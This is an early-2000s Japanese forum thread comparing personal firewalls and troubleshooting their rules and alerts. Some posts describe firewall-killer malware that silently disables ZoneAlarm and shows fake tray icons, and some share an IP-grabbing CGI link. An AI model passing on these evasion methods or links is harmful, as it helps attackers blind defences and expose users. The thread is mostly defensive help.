ファイアーウォールソフト 総合スレッド Part2

皆さん、自分のPC大丈夫ですか？
ファイアウォールで不正侵入などを
防ぎましょう・・・。

前スレ、Windows板［ファイアーウォールソフト 総合スレッド］はこちら。
http://yasai.2ch.net/test/read.cgi?bbs=win&key=990201178

目次
>>2　【各種 Firewall】 【ログ解析ツール】 【日本語パッチ 等】
>>3　【セキュリティ チェックサイト】 【Whois】 【解説サイト】 【過去 & 姉妹スレ】

【各種 Firewall】

ZoneAlarm
http://www.zonelabs.com/

Sygate Personal Firewall
http://www.sygate.com/

Tiny Personal Firewall
http://www.tinysoftware.com/pwall.php

AtGuard
http://download.lycos.com/swbasic/BasicResults.asp?query=atgd322

BlackICE Defender
http://www.toyo.co.jp/security/

Snort for Win32
http://www.datanerds.net/~mike/snort.html


【ログ解析ツール】

ICEWatch
http://keir.net/icewatch.html

ZoneLog Analyser
http://zonelog.co.uk/

TPF Log Analyzer （Tiny Personal Firewall用）
http://server47.hypermart.net/tinyfirewall/

【日本語パッチ 等】

ZoneAlarm　Pro体験版
http://www.zonelabs.com/zap_download_trial_4.htm

ZoneAlarm 日本語化パッチ その 1
http://etcd.virtualave.net/

ZoneAlarm 日本語化パッチ その 2
http://www.ryulife.com/net/security/index.html

Tiny Personal Firewall 日本語化パッチ
http://www.geocities.co.jp/SiliconValley-Cupertino/2943/

【セキュリティ チェックサイト】

Shields UP !
https://grc.com/x/ne.dll?bh0bkyd2

Shields UP ! の日本語解説サイト
http://yasai.2ch.net/test/read.cgi?bbs=win&key=971411733&ls=100

[セキュリティ板] 最強のファイアーウォールソフトって何かな？
http://ton.2ch.net/test/read.cgi?bbs=sec&key=988724444&ls=100

[パソコン一般板] 自分のパソコンへの不正侵入対策してますか？2
http://salad.2ch.net/test/read.cgi?bbs=pc&key=980600110&ls=100

[パソコン一般板] 自分のパソコンへの不正侵入対策してますか？
http://salad.2ch.net/pc/kako/975/975513933.html

[初級ネット板] 簡易ファイアーオール
http://mentai.2ch.net/hack/kako/972/972826108.html

この、スレッドはセキュリティー板の方がいいと、
言うことになりましたので、こちらに移動しました。
何卒、ご理解いただけるようにお願いいたします。

荒らされないよう、とりあえずsageときな。

セキュリティがなってねえぞ！

ZoneAlarm使っているんだけど、
アラームが出た後に、ウィンドウが
タスクバーと重なってしまうことありませんか？。
（板違いなのは承知ですが、ファイアウォール
の話はここしかないのでねぇ〜...）

hf

>>4
かってに決めないでね、いい子だから。よしよし。

そんなことしてると、誰にも相手にされないよ。

現に、人がいないね。

いちおうあげますか…

フリーのやつで特定のポートを民衆に開放するって設定は出来るんでしょうか？
出来ないと自宅鯖がヒッキーになってしまう…

>>10
ぞねはできるよ

前からちょっと気になってるんだけど、Zoneのね、トラヒックモニタ
(転送量表示するアレ)が効かないアプリとか有るんだ
RegetとかCUTEでFTP使ってると全然転送量が変わらないの
これ何とかならないかなぁ････
穴開いてる訳じゃ無くて、PORTの方はちゃんと監視出来てる
見たいなんだけど、ちょっと気になるっす。

誰も使ってないみたいなので、ちょっと AtGuard を入れてみたけど、
これって最高なんじゃない？
少なくとも某３強よりも気に入った。
ルールを逆引きでも設定可能だし、自宅鯖にも使えるからねぇ。

Sygate Personal Firewall の日本語ﾊﾟﾁない？

Sygateって日本語化しないといけないぐらいの英語だったっけ？

>>12
そうまでしてMP3落した量測りたいか
この割れ厨がっ！！

Sygateのパッチはないよ
それにしてもOutpostちょっと不安定だ

>>16
違うって、^^;;　そう言う意味じゃなくて、この場合少なくともトラヒックモニタ
はパケットが監視出来てないっていう事でしょ?　それが何となく気になるんすよ
ゴチャゴチャしてるうちにPORTもおっひろげに成らないかなとか････
転送量なんか何でも測れるじゃーーん

>>12
苦しいな（ｗ

BlackIceで0.0.0.0のFilter failedが出るんだがハックされてるのだろうか？
ちなみにWin2000

>>20
俺もコレは知りたい。
どういう状態でカウントされてるんだ？

フリーウェアなのはどれ？

>>20-21
(-.-")凸 FAQ!
http://www.toyo.co.jp/security/ids/support/faqj/attack/qj00030.html

>>22
>>3で紹介されてる↓に行って調べてみな。
http://members.tripod.co.jp/eazyfox/

zone alarmダウンロードできない

Thank you for choosing ZoneAlarm version 2.6 to secure your Internet-connected PC.
Your download will begin momentarily.

ってとこでずっと持っているんだけど

>>24
Asiaから落とそうとしてるのかな？
USからの方がいいよ。

>>25
ありがとう
出来ました

素朴な疑問。
どーして２ちゃんではファイアウォール＝パーソナルファイアウォールなんでそ？
濃い方が多いのに

>>27
飽きただけと思われ。
情報流が業者に限られるのもあるが。
しりたきゃ、英語ページ読むか、日経雑誌読むか、
その筋のセミナーでも行ったほうが早い。
業務用を２ｃｈで批評しても、不毛に終わることが多いし。
そういう意味じゃ、ＭＳ系は批評（批判）多いから、
ＭＳがその程度っつうことかもな。

すんません、ここで聞いていいんでしょうか、
ノートンのオプションでイベントログってのを昨日初めて
見たんですが、１日１〜３回くらいこんなの

未使用ﾎﾟｰﾄﾌﾞﾛｯｸ機能が通信をﾌﾞﾛｯｸしました｡ 詳細:
ｲﾝﾊﾞｳﾝﾄﾞ TCP 接続
ﾘﾓｰﾄｱﾄﾞﾚｽ､ ﾛｰｶﾙｻｰﾋﾞｽは 209.12・・・・・

出てるんです。これってなんでしょう？時間を見ると、ちょうど
何もしてない状態でマウスが１，２秒間砂時計になってる時
でした。

>>29
どっかから君のPCにアクセス
　↓
それをノートン大先生がブロック
　↓
（ﾟдﾟ）ｳﾏｰ
　↓
でも、フリーでノートンよりも良いのはある（ノートン、重い）
　↓
(;´Д`)

ノートン先生使ってますが、Windowsの共有が使えなくなりました。
設定をどのようにかえたらよいのかわかりません。OSはWindows2000です。
マニュアルみろとか言われたけど、おまけで付いてたやつなので無理なので
教えてくだされ

>>29
ポート書けよ！アホカ
syslogじゃねーのか？
あ、tcpか。
どっちにしても、ポート書かなきゃわかんねーだろが。
メンドクセーから屍鰻てっくに聞けよ。

NETBEUIで共有エヘヘ

TCP/IP over NETBIOS
を有効。これは勧めません

>>31
農豚は外と中の設定が一緒だから、わずらわしいぞな。
ローカルアドレスに限って１３７のＵＤＰと１３９のＴＣＰを許可しとくぞな。
プロセスもＳＹＳＴＥＭに限定しとくぞな。

ｼﾘｱﾙﾎﾟｰﾄ1 (ﾃｨｰｴｰﾆﾂﾅｲﾃﾞ､ﾈｯﾄﾖｳ)
ｕｓｂ2　（ｿﾉｳﾁ1ｺ ﾃｨｰｴｰﾆﾂﾅｲﾃﾞ ﾃｨｰｴｰ ｿｳｻﾖｳ)

ﾌﾚｯﾂ｡

http://www.guest.marunouchi.co.jp/
なんかの交際クラブがアクセスしようとしてきた。
こんなとこ知らんのに…

www.tv-asahi.co.jp
何でテレビ朝日も・・・

Windows2000SP2入れて以来、ぞぬのCPU使用率が100%になっちゃう。
前スレで同様の症状の人みつけてちょっと安心しつつTiny入れたけど、
SP2入れてぞぬが普通に使えてる人との違いが気になる・・・いるのか？
IEが5.02sp2って以外、かなり素の状態のWindows2000なのになぁ

>>39
ああ、Win板の方で言ってる人いたね。
まあなんでかは解からないけどZone使うことも
ないじゃん。TinyとかSygateの方が全然いいし。

>>40
返事ありがと。

で、実際Tiny見てみて、ポリシー設定が何かFirewall-1っぽい感じのGUIなのがかなり好印象で
先々はTiny使うつもりなのは確かなんだけど、使いこなせるまでの間使いたいのと、
単純に明確な原因が分かればいいかなぁと。
SP2が原因だって分かっちゃえばそれでいいんだけど、SP2使用者で
普通に使えちゃってる人がいたら、なんだかなーだし。

W2KでICS使ってる場合の設定が分かれば、TinyおんりーでOKなんだけどね。
SourceAddressの指定ができるのか知りたい。
DistinationAddressとDistinationPortは簡単に指定できるけど。

何か用事か？東めた。
いつもチョコチョコ来てるけど。
a. [IPネットワークアドレス] 211.15.33.0
b. [ネットワーク名] TMC
f. [組織名] 東京めたりっく通信株式会社
g. [Organization] Tokyo Metallic Communicates.
TinyからZoneに入れ替えてから２回目です。

>>41
今Sygate使ってるからTinyは覚えてないけど、
ソースアドレスはさすがに・・・もちろんSygateも無理

>>43
うーん、Proxyでも立てるかなぁ。
まあ、色々やってみるわ。
ありがとね。

ttp://www.digitalstar.ne.jp/
これどう？？

Tiny って ICS との相性がムッチャ悪いんじゃなかったっけ？

ICSってなんだい？

>>45
悪くないけど、定価６０万だよ〜。
今ならキャンペーン期間中で４９万になるらしい。

>>47
Ｉ・・・インターネットを
Ｃ・・・共有
Ｓ・・・する

というわけで「インターネット接続の共有」の事ね。

>>49
そゆことです。
Microsoftもそう呼んでるみたいだから、ってことで略しっぱなしで言っちゃった。てへ。
http://support.microsoft.com/support/kb/articles/Q234/8/15.asp

>>46
やっぱそうなのかなぁ。
まあ、のんびり情報集めて頑張ってみるて、駄目なら考えるわ。

>>50

まあそれならTinyにこだわらなくてもいいかもね。
ICSとは関係無いけど、ファイヤーウォール選ぶなら
ここのレビューとかも結構参考になるかも。頑張ってくれ

http://securityportal.com/firewalls/personal/

忘れてた、一応これもね。
有名だから知ってると思うけど

ttp://members.tripod.co.jp/eazyfox/

荒らし依頼、自慢掲示板
Duke

(かぐや総本部)
http://hp.bank-sakura.com/kgy999/

>>51
重ね重ね、本当にありがとね。
51の方は知らんかったわ。

ま、前ぞぬ入れてたときも、大した攻撃なかったし、気長にがんばってみるわ。



・・・なんかほのぼのしてる気がする（ｗ

>>52
知ってるも何も...
>>1-3を見てやってよ。じゃないと無意味になってしまう。

>>55
すまん、すっかり忘れてた

windowsのファイル共有つかいたいんですが、どのポートあけたらいいのかおしえてください

netbios-ns 137/tcp NETBIOS Name Service
netbios-ns 137/udp NETBIOS Name Service
netbios-dgm 138/tcp NETBIOS Datagram Service
netbios-dgm 138/udp NETBIOS Datagram Service
netbios-ssn 139/tcp NETBIOS Session Service
netbios-ssn 139/udp NETBIOS Session Service

58さんありがとうございます。あなたは神様のようなかたです。
こんな掲示板で暖かい心になったのは初めてです。

>>59
こんなとは何だ！

会社でwinMXを使いたいんだがﾌｧｲﾔｰｳｫｰﾙのせいでうまくつなげない
ﾌｧｲﾔｰｳｫｰﾙの種類とかもわからないんですが
設定の仕方が悪いんでしょうか？
winMXが使えない仕様のﾌｧｲﾔｰｳｫｰﾙもあるんでしょうか？
「SOCK4を使う」「SOCK5を使う」という設定があるんですが
両方試してみたのですがダメっぽいです
無知ですいません
ICQも同様で使えません

無知ですいませんとか言ってないで
生まれてすいませんと言え

会社にこそすいませんと言え

NT系の OS は自前で TCP/IP のフィルタリングが出来るようですが、
これってファイヤーウォールの代りとして充分なんでしょうか？

生まれてすいません
会社にすいません

黒氷って、こっちが監視されるって言う話を聞くがどうなの？
購入を検討しているのだが、そこが気になる。

PCGATEってぞぬがバージョンアップしてもそのまま？
メジャーバージョンアップしたらまた\3500取るの？

そうだったら嫌すぎ。

>>66
？？？　んなこたぁないよ

>>67
NECならやりかねんな。つーかPCGATEなんか使うな

>>64
どの程度のものをファイアーウォールというかによるなぁ。
こまい設定ができなくて、メインにすえるには無理があるかも。

でも、やらないよりはやるべきだよな。

>>61
ポートの関係じゃないんですか？
確かＷＩＮＭｘは6699を利用していて
1024までのポートを何とか何とかとか言ってたな？
つーかﾏﾝｺ

>>61
それが貴方の会社のポリシーによる設定なら、従うしかないんで無いの？
それか管理者に問い合わせて確認取るか。
というか、>65の書きコ見ると業務上正当な事由じゃないのね（ｗ

>>71
どんな業務でWinMXとICQを使うんだよ（ｗ

>>61
WinMXが使えない仕様のファイヤーウォールなんてものは
無いよ。ただ使えない設定になってるだけ。会社のファイヤー
ウォールでそんなポート通過させる訳ないっしょ。

最近よく落ちるなーと思ってたら（Windows2000)Outpostが原因でした。
ZoneAlarmやBlackICEにしてみたら全然落ちない。
Outpost自体は気に入ってるので更なる改善を望みます。

私も一時BlackICEにしたけど、今はZomeAlarm。

ZomeAlarmの最新版は大丈夫なんですか？

>>75
大丈夫ってどこらへんのことを聞いてるの？

>>76
あそこらへんのことですが何か？

>77
ソコはｲﾔｰﾝ

最近ぞねからTinyに変えたものです。
Tinyのアクセスのﾛｸﾞってどこで見るのでしょう?
ステータスウィンドウ＞ログ＞Firewallのログがずっと空欄のままです。
ping撃ってもらってアラートは出たんですがログは残らないし、Shield up!
のページでテストしてもアラートもログも出ません（全部ステルスでしたが）
filter.logを出力する設定にはしてます。どこで見れるのでしょうか?

Outpost単独で入れるのこわいなー。
他のFWと共存してる人いる？

>>79
ルールを作ってないからだよ。
Win板だけどここらへんを参考にすれば？
http://yasai.2ch.net/test/read.cgi?bbs=win&key=990201178&st=238&to=238&nofirst=true
http://yasai.2ch.net/test/read.cgi?bbs=win&key=990201178&st=728&to=728&nofirst=true

もっと細かく作るなら、
http://server47.hypermart.net/tinyfirewall/rules.html
英語だけど↑を参考にするといいよ。
いちいちルール作るの面倒だと思うなら他に乗り換えた方がいいよ。
（ちなみに日本語化パッチは>>2にあるサイトで）

>>81
わかりました！ご丁寧にありがとうございます！
後はお客さん待ちです。ﾜｸﾜｸ

日本語版のフリーのファイアーウォールってありませんか？

>>83
ぞぬを日本語化する
>>2参照

>>83
Tinyを日本語化する
やり方は調べろ

ノートンの試供版をつかってます。これってどうですか？

ノートンっていくらなんですか？

ノートンって誰ですか？

ノートンなんですか？

No�d

ノートンのVer3ってどこが変わってんの？
てか、liveupdateしてれば自然と
ヴァージョンアップしてくれてんの？

あ！既出の予感･･･まぁいいや

>>87
ここ、見てね。
http://www.symantec.com/region/jp/products/npf2001/

ＢｌａｃｋＩＣＥを導入して１ヶ月。しかし、未だアタックされた形跡がない。
喜ばしいことだとは思うが、本当に機能しているのか心配になってきた・・・。

>>94
忘れた頃にアタックにきてくれるよ。
もし来たら感謝しよう。

＞ＢｌａｃｋＩＣＥを導入して１ヶ月。しかし、未だアタックされた形跡がない。

常時接続してるんなら異常です。
一日一時間程度なら普通です。

BlackICE使ってるけど、ver2.5chjあたりから時々おかしな
動きをするようになった。動作してるはずなのに、アタックを
全然検出せず、画面右上のランプも点滅しない。う〜ん。謎。

ADSLで繋ぎっぱなしになったにも関わらずダイアルアップでテレホタイム
だけ繋いでいたときよりアタック減りました…
なんかBlackICEイマイチ信用ならんのでSygateかTiny使ってみます。

やっぱ変ですよね。ＢｌａｃｋＩＣＥは。
とっいうことでＳｙｇａｔｅに変えました。

ZoneAlarm入れたら1時間に一回はプロテクトしたと警告メッセージが。
今フレADSLだけど、これってＺＡ入れる前には気がつかないだけで
ばんばん来てたって事ですかね？
なんか怖くなってきたっす。

同じくTinyに変えました。
ただ、やっぱり一番下に追加しておくルールのことが判りません。

プロトコル　　　"Any"
方向　　　　　　"Both"
アドレスタイプ　"Any address"
有効期限　　　　"Always"

を、選んで遮断してログを残す＆ダイアログを表示にチェックを入れて
名前付けて登録して一番下に置いとくだけで良いのでしょうか？

便乗で質問させてくださいませ。

>>100
ＦＷは初めてですか？
今日ずーっとＦＷスレ読んでたんだけど
”ネットワーク内は鉄砲玉が飛び交ってる世界”って書きこみを見ました。
その中で実際、悪意を持った鉄砲玉はほんのわずかしかないですよ。
安心してください。

ぞぬからノートンにしたんだけど、とたんにネットが遅くなった…。
やっぱぞぬの方がいいのかなぁ？シンプルだし…。

>>101
そうするとその規則の上にある全ての許可する規則にあてはまらないアクセス
（つまり不正アクセス）を弾くでしょ。それでいいのです。
上にある規則の方が優先度高いから、一番下にしとかなきゃダメよん。

>>100
102の言うとおり心配無いと思うけども同じとこから同じポート叩かれてたりするんなら
ここに書いてみれば？あとアウトバウンド（内＞外）のアクセス要求があったら
ちょっと気をつけたほうがいいと思う。

関係ないけどTinyでルール作るとき出来るだけポート絞ったほうがいいぞ。
この前IP抜きのCGIでRealPlayerから抜かれたから。（思いっきり全開だった）
当然絞ったら抜けなくなった。

>>105
RealPlayerから抜かれたというのはパッチで対応できないもの
なんですか？
ぞぬでは設定はできないですか？

>>104
答えて頂きありがとうございます。
で、設定後はネット経由で使用したいアプリの時にその都度チェックを
はずしてわざと通してやるというわけですね。

>>105
ポートを絞れって・・・！？
たしか聞く所ではポートって６５５３６もあるのでは・・・
許可してるアプリでも”Any port”ではいけないってことでしょうか？

余談ですがうちフレッツＩＳＤＮなのですがＩＰアドレスが変わった模様です。
たぶん７月から発信先電話番号が統一されたことと関係があるのでしょうかね。

>>104
＞ここに書いてみれば？

おいおい冗談言うなよ。ここはアタック報告スレじゃない

>>105

35 名前：名無しさん＠お腹いっぱい。 投稿日：2001/06/27(水) 10:05
>>27よりこっちのほうがいいんじゃないか？
ちょっと感心したよ。そこまでして抜きたいかって感じ（ｗ
俺も抜かれちゃったよ。さすがにMediaPlayerとかRealPlayer
はAskにしてなかったから。まあIPなんか抜かれても
どうでもいいんだけど。

http://samurai-x.hypermart.net/cgi-bin/kitty.cgi

多分これのことだろ

ノートンＰＦ買ったけど
マニュアルが不親切で全然わからん
なんとかならんの？

>>109
↑のcgi踏むとMediaPlayerやRealPlayerやWindowが何個か現れたんだけど
ZoneAlarmで許可をNoにしたら接続しなかったみたい。
これでももう誰かにIP抜かれてるの？

追加：Telnet Programというのを遮った。

>>108
＞「同じとこから同じポート叩かれてたりするんなら」
＞ここに書いてみれば？
ってこと。一週間同じやつから同じポーと延々と叩かれてたりしたら興味無いかい？

>>106-107
さぁ？どうなんでしょうね。
まぁこっちが接続さすのが悪いわけで。
ポートをしぼれっちゅうのはTinyならアラート出して
「適切なルールを作り次回から･･･」云々出てきたら下のボタン押して
このポートだけ許可するってとこ無いっけか。そーやって設定してください。
俺も厨で良くわからんが普段リアプレが落とすのに使うポートが80で、IP抜かれたときは
全然関係ないポートから来たからさ。（確か5桁の）

>>109
それっす。

>>110
そんな難しい？
つか体験版あるのに,,,買うの早過ぎるよ。

>>106
ごめん、ぞねはどうだっけ？ポート絞れないって事は無いと思うけど･･･
新しいプログラムの接続要求でポートも記憶してたような気がするんだけどなぁ･･･
ためしに109踏んで見たら？（ｗ

>>111
抜かれてない。抜かれたところでどうって事も無い。

>>113
悪いが興味ない。連続で同じポート叩いてくるような
奴は素人だろ。変なパケットが来たとかなら興味も
あるが、大抵はセキュリティサイトで調べればわかるし。

>>115
>ためしに109踏んで見たら？（ｗ

さっき試しに踏んでみたんです。
>>111にも書いた通り、Telnet Programの許可を尋ねるバルーンが
出てきてNoを選択したので接続は失敗したみたいです。
これってIPは抜かれてないんでしょうか？

>>116
そーか、そりゃ失礼でした。同じポート狙うことは無いか。にしても
同一人物があの手この手でバッファオーバーフロー狙いとか断片化パケ投げとか
やってんならちょっとおもしろいなと思って。まぁ、
そこまで恨み買うような事してればですけど･･･
厨房丸出しのレスでごめんね。

>>117
大丈夫、抜かれてないよ。つーことはぞねは勝手にポート絞ってくれるってことだね。
もちろん116の通り抜かれても実害ありませんが。まぁ、ログにリンク貼ってるから
ちょっと恥ずかしいかもしれないけどね（ﾜﾗ

>>116
あー、すんません。
書くのに時間かかってたんです。

>>114
薄っぺらいマニュアルだけで初心者にはさっぱり
ヘルプも今一だし・・・
１年間は無料でアップグレードできるよ。

>>119
ありがとございます。
夜中なのに親切な人がたくさんいて嬉しいっす。

>>119
ポートを絞ってるわけじゃない。
AllowでもDenyでもなく、Askになってるからだろ。
AskでYES　NO聞かれて全部NOにすれば抜かれるわけないさ

ああそうか、許可をたずねるバルーンね。許可にしたらどこまで許可されるんだろ。
まぁAskにしとけば問題ないけど･･･

許可したらぞぬは全ポートAllowになるだろ。
ぞぬプロはポート制限できるみたいだが

ポート制限できないのか！なんだかなー
まぁ初心者向けって事なのかなぁ･･･

>>123
＞AllowでもDenyでもなく、Askになってるからだろ。

Media Player,Real PlayerともAllowの設定でした。
ということは防いだのはTelnet Programだけで
両Playerとも接続はしてたってことなんですかね？

>>127
あら、そうなんだ。じゃあ抜かれたね。116で抜かれてないって
書いちゃったけど、よく考えたらMediaPlayerもRealPlayerも
接続できませんって感じのメッセージが出るんだよな。

俺ももう一回109試してみたけど抜かれちった。何でだろ。
リアプレのアクセスは拒否されてるしアラートも出てるんだけどな。
当然telnetとかはもちろん･･･うーん。

>>109は

http, ftp, gopher, https, pnm, mms, rlogin, tn3270, telnet, news
使って抜こうとする。

telnet.exe, MediaPlayer, RealPlayer, Newsクライアントの
接続ブロックすれば平気だと思うが

まさかIEの制限してないとか・・・

うおお！proxyomitron外していってみたらtelnetやらメールやらいろんなもの開いてびっくりした！
しかしよくかんがえたらomitronのポート制限してなかったんだよね･･･アホだ
あとIEってTinyだとデフォでアクセスできるようになってる気がするんだけど

IEがデフォでアクセスできるんじゃなくて最初っからおみとろん通してたから
おみとろん許可したからそう勘違いしたみたい。
とりあえずおみとろんのポート80だけ許可にしたらIP抜けなくなりましたとさ。

Tinyユーザですが、ローカルのポートを絞らないことによって
不正アクセスに利用されたりすることはありますでしょうか
ローカルのポートを絞ってしまうとリアルプレーヤなどでは
動画ごとにポートが違ったりして困ってます。
（そもそもローカルのポートがどういうものなのか分かってないのですが）

ブラウザとかメーラーとか、絞れるものは絞った方が
いいけど、RealPlayerとかはほっといてよし。

black ICEいれて一週間ぐらいたつけど、
誰もこない・・・・。

便りが無いのは良い便り

暇だからmegasecurityにあったマイナーなファイヤー
ウォールキラーの類をちょっと覗いて見たけど、やっぱ
AtGuardはもうダメだね。開発の止まったソフトはいかんわ。

The FireCracker automaticly detects AT Guard, Zone Alarm
and or McAfee Firewall, deactivates it and deletes it from
the harddisk.The original Firewall Icons are in the
taskbar all the time, so it looks like nothing is happened.
It also reloops the funktions that the victim must reboot
the cputo reinstall the firewall(s).100% Invisible

まあ俺がチェックしてなかっただけで、とっくの昔にリリース
されてたんだろうけど。

ファイルの日付見たらやっぱり結構前から
あったようだ。リリースは今年の3月ぐらいか。
まあどうでもいいけど

さらにZoneAlarmKiller系もチェックして見たけど、
TLのZAKillerはリリース日が4/9だけど、ZoneKillerは
6/12だね。もしかして最新バージョンにも対応してんのかな。

あとZAKillerはどうやってるのかと思ったら、Zone自体を
どうこうするんじゃなくって、Zoneのプロセスをkillして、
偽アイコンを表示させといて、裏でHTTPプロクシを立てるって
感じだね。ちょっと楽しそうだ。

あっ、ZoneKillerの正式なリリース日は知らんよ。
ただファイルの日付見ただけだから。まあとにかく
ぞぬ使いは気をつけてね

ぞぬやめた方がいいのかな

結局、初心者はゾヌがオススメですか？

なんでそうなる（ｗ

　　　　　　　　　　／＼
　　　　　　　　／ 　　　＼／＼
　　　　　　　　|＼ 　　／　　　　＼／＼
　　　　　 ／＼ 　＼　|＼ 　　　／ 　　　＼／＼
　　　　／ 　　　＼　　| 　＼　 |＼ 　　　／ 　　　＼／＼
　　　　|＼ 　　　／　 .| 　　　　　　＼ 　|＼ 　　　／ 　　 ＼ ／＼
　　 ／ ＼ ＼／　　 　| 　　　　　　　　　 　 ＼　 |＼　　　／　　　 ＼／＼
　／ 　　　＼ |　　　　.|　　　　　　　　　　　　　　　　 ＼　|＼ 　　 ／　　 　＼／＼
　|＼ 　　　／|　　　　 | 　　　　　　　　　　　　　　　　　　　　 ＼|＼　　　　／ 　　　＼
　| 　＼ ／／＼　　　　　　　　　　　　　　　　　　　　 　　　　　　　　＼ ／ 　　　　　　 ＼
　|　　　|／ 　　 ＼ 　　　　　　　　　　　　　　　　　　　　　ｳﾜｧﾝ!　 ／＼ 　　　　　　　　　>
　|　　　＼ 　　　／| 　　　　　　　　　　　　　　　　ヽ(´Д`)ノ　　／　　　　＼ 　　　　　／　.|
　|　　　　 ＼ ／／＼ 　　　　　　　　　　　　　　／　（　　）　 ＼ 　　　　　　＼ 　　／ 　　 |
　|　　　　　　|／　　　＼ 　　　　　　　／＼　／ 　　　<　ヽミ３　＼　 　　　／| ／　　　 　 |
　|　　　　　　＼ 　　　／| 　　／＼／ 　　 ＼ 　　　　　＼ 　　　／|　　 ／　　 　　　　　　 |
　|　　　　　　　 ＼ ／／＼／ 　　 ＼ 　　　　＼ 　　 　／|　 ／ 　　　　　　　　　 　 　 　　|
　|　　　　　　　　　|／　　　＼　　 　　＼ 　　　／ |　／　　　　　　　　　　　　　　　　　 　　|
　|　　　　　　　　　＼　　　　　＼ 　　／ |　／　　　　　　　　　　　　　　　　　　　　　　　 　.|
　|　　　　　　　　　　 ＼ 　　　／| ／ 　　　　　　　　　　　　　　　　　　　　　　　　　　　　　.|
　|　　　　　　　　　　　　＼ ／　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 |
　|　　　　　　　　　　　　　 .|　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 　.|
　　　　　　　　　　　　　　　|
　　　　　　　　　　　　　　　|
　　　　　　　　　　　　　　　|

>>144
フリーだし、日本語のパッチ当てられるし、設定が簡単だから。

>>146

>>138-141は読んだの？

>>147
読みました。
有名なTOOLなんですか？
私は知りませんでした。
ルーターも入れてるので安心しきってますが、やっぱ甘いですかね。

ん、まあいいけどね。ルーターもあるようだし。
ぞぬは有名な分クラッカーに狙われやすいから
ってだけだから。セキュリティホールがいくつかみつかったり
するけど大したことないものばっかりだし。

でも重いからなぁ・・・まあ確かに初心者にはいいかもね

>>149
サンキューです。
とりあえず、ゾヌを使い続けてみます。

とあるバナーを読み込むときに必ずポート8787の接続要求を受けるんですが
これて何なんでしょう？遮断するとバナーが×になります。

よくある話だよ。いわゆるWEBバグってやつ。
Javaアプレットでソケット使ってどっかのサーバーに
接続しようとするやつが多いけど、まあ大したこと
やってるわけじゃなく、広告表示の為のなんかやってるだけ。

ほかにもそんな感じでどっかに接続しようとするカウンター
とかも最近みかけるね。まあもちろん全部遮断しちゃって
問題なし。

Windows2000SP2でZoneAlarm使っているんですけどZoneAlarmを
終了させると１００％の確立でPCが再起動してしまいます。
解決方法わかる方いませんか？
他のソフトを使えというのは無しでお願いします。
（一通り試してみてZoneAlarmにしてるもんで・・・）

>>153
うーん、なんだろうね。
家も全く同じ環境だけど、再起動はしないよ。
ゾヌのバージョンは2.6.88だけど。

>>152
そうなんですか。カウンターはアクセス解析の情報取得に使われることが多いって聞いたので
proxyomitronで殺してたんですが同じようなものなのですか。全部遮断しておきます。
ありがとうございました。

>>153
SystemError怒ると再起動する設定にしてるんでは?

アタックが来たら即座に知らせてくれるFWって
ぞねとノートンだけですか？

????????????????????????????????

>>157
????

>>157
翼�・・艢朽・楳÷凍÷ｖbｅ��ょ"・

繝｢繝ｭ縺ｫ縺九?ｶ縺｣縺滂ｽ･?ｽ･?ｽ･?ｽ･

何言?b?U楸殀慰旭旭ｰ！！！！！！！！日本悟ﾁﾞ喋ﾚ智?ﾕ！！！！！！！！！！！！！！！！！！！！！！！！！！！

addr +0 +1 +2 +3 +4 +5 +6 +7 +8 +9 +A +B +C +D +E +F 0123456789ABCDEF
0000 82 C8 82 C9 82 A2 82 C1 82 C4 82 C1 82 A9 82 ED ................
0010 82 A9 82 F1 82 CB 00 .......

>>156

おっしゃる通りの設定になっていました。
でもウチのZoneAlarmは終了するたびにエラー起こしてるってことですよね・・・・

>>164
うちの場合、Outpost使っててやたらと再起動（何の前触れもなく）するから
おかしいな〜って考えてて、その設定に気付いた。
つい最近の事だったから（20日ほど前）、すぐ分かったわけです。

Zonealarmやめて、SygateかTinyにしたらどうですか?

かなり前のトラブルの続きだけど、ICS環境でTinyでどうにか通信できるようになったよ。
「InternetGagewayで動作」みたいなチェック入れるのと、あとどっかいじってたら、
一応LAN内のマシンすべてで通信が出来る状態に。
信頼するネットワークとかかな？
まだ穴だらけだけどさ（ｗ
ま、のんびり設定するさ。

あらためて付き合ってくれた人たちに感謝

おっ、解決したのかい。おめでとう

ウイルスバスター2001のファイアーウォールやばいって本当？
自分はテレホで一時間くらいしかネットやらのにけっこういろんな
ところからアタックかけられるんだけど
これってもう破られてるからかな？

>168
？？何だろうな。
サーバー業務用のアレのことかな。。
というか、パーソナルな方にも穴有るのかな。
アタークされたとウォールのログに残ってるうちは大丈夫なんでないの？？

太文字だと見やすくて良いね。

まさか業務用じゃないだろ（ｗ
ウィルスバスターに穴があるっつーのは聞いたことないが、
確かに評判は最低だな。まあ堅さはどんなもんか知らんけど、
めちゃくちゃスループット下げるから評判悪くなったんじゃないのん？

業務用のわけないでしょ、初心者なのに（笑
普通に店頭で売ってる奴、確か7000円くらいだった
店員が「ファイアーウォールソフトじゃこれが一番売れてますよ」って
言うから買ったのに評判は芳しく無いみたい
ほとんど話題にも乗らないありさま・・・何で評判悪いの？
常時接続に切り替える時にノートンに切り替えた方が言いと思う？

>>172
なんでｷﾐは金出して買う事しか考えないのかね?
OS以外はフリーで十分やってけると思うよ。

>>173
頑張ればOSもフリーで逝けます。

確かにウイルスバスターのパーソナルファイアーウォールよりも
評判がいいフリーソフトいっぱいあるよね
フリーソフトに乗り換えようかな・・・
しかしフリーソフトよりもはるかに評価が低いウイルスバスター2001って（藁

>>175
全部です!!

と、これ以上責めても可哀想だし止めておくけど、TinyがSygateで良いんじゃないかな。
Sygateだったら細かい設定は全く必要要らないし、逆にTinyなら細かい設定も出来るし軽いし。

ぞぬみたいにアタックが来たらすぐにバルーンで知らせてくれる
FWってノートン以外でありませんか？

>>177
Tinyもポップアップ出せたはずだけど？

>>178
サンクス。

出せないfwなんてあるのか？
つーか>>157-163ﾜﾗﾀ

>>180
出せないのは結構あるぞ。

出せないってのはアタック毎のポップアップか？
パーソナルfwで？
それはしらなんだ、でも有名なのは大体出せると思うけどなぁ

つーか本当にアラート出せないPFWあんのかなぁ･･･
あったとしても許可されてない全てのアクセスをaskにしておけば
必ずpopup出ると思うが･･･

「一番売れてるものは一番よくないものだ」マカフィーの法則

内から外へのアクセスは、ほとんどの全部のfwが
ポップアップだすだろうけど、ポートスキャンぐらいで
警告ポップアップだされるとうざい。

どれでもon/offできるでしょ
それ以前に（インバウンドだろうと）ポップアップ出せないfwなんて
ほとんど無いと思うけど

このスレを読みまして、ファイアーウォールを導入したところ、
早速、ブロックしてくれました。台湾からでした。
